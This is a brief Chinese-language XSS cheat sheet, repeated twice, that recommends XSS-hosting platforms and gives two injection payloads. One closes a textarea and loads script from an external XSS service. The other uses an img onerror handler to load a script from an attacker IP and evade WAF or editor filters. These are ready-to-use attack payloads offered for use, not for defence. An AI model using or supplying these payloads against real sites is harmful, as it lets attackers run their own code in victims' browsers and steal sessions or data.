1. XSS有专门的平台可以注册并使用。 例如 xs.sb 域名极短。 适合注入
2. 使用这个来测试:
</tExtArEa><sCRipt sRC=//xsshs.cn/FxAp></scRIpt>
3. 使用onerror事件,来规避script关键字:(例如某些WAF或者editor会拦截)
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//YOUR-IP/url.js'>
1. XSS有专门的平台可以注册并使用。 例如 xs.sb 域名极短。 适合注入
2. 使用这个来测试:
</tExtArEa><sCRipt sRC=//xsshs.cn/FxAp></scRIpt>
3. 使用onerror事件,来规避script关键字:(例如某些WAF或者editor会拦截)
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//YOUR-IP/url.js'>